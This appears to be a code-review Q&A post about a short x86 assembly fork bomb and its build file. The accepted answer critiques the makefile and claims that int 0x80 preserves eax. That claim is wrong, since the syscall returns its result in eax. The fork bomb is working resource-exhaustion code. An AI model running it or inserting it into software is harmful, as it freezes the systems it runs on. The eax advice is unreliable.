# Fork Bomb virus in Assembly

Tags: assembly

I made a fork bomb virus in Assembly. Now, I want to make my code better.

Here is my code:

```
section .text
    global _start

_start:
    mov eax, 2
    int 0x80
    jmp _start
```

Makefile:

```
DIR=build
$(shell mkdir -p $(DIR))
$(shell nasm -f elf64 Program.asm -o Program.o)
$(shell ld Program.o -o build/ForkBomb)
$(shell rm Program.o)
$(shell echo "run.sh" > build/run.sh)
$(shell echo "./build/ForkBomb" > build/run.sh)
```

Comment: It’s not a virus because it doesn’t replicate. It’s just a nuisance.

Answer (score 6, accepted):

- `int 0x80` preserves `eax`. There is no need to reinitialize it in the loop.
- `Makefile` is not really a makefile. The purpose of a makefile is to avoid rebuilding stuff which is still up to date. Your makefile rebuilds the program even if nothing has been changed. Consider instead

  ```
  build/ForkBomb: Program.o                  # tell that if Program.o changes, ForkBomb shall be remade...
      ld -o build/ForkBomb Program.o         # ... using to this recipe

  Program.o: Program.asm                     # tell that if Program.asm changes, Program.o shall be remade....
      nasm -f elf64 Program.asm -o Program.o # ... using this recipe
  ```

  This is pretty much it. If you want a `build` directory to be created automagically, and without warnings, study [order-only prerequisites](https://www.gnu.org/software/make/manual/html_node/Prerequisite-Types.html).
- If you want to use macros (like `DIR`), use them consistently.
- There is no point to `echo "run.sh" > build/run.sh`. This will be overwritten immediately by `echo "./build/ForkBomb" > build/run.sh`.

  That said, I see no reason tor `run.sh` to exist.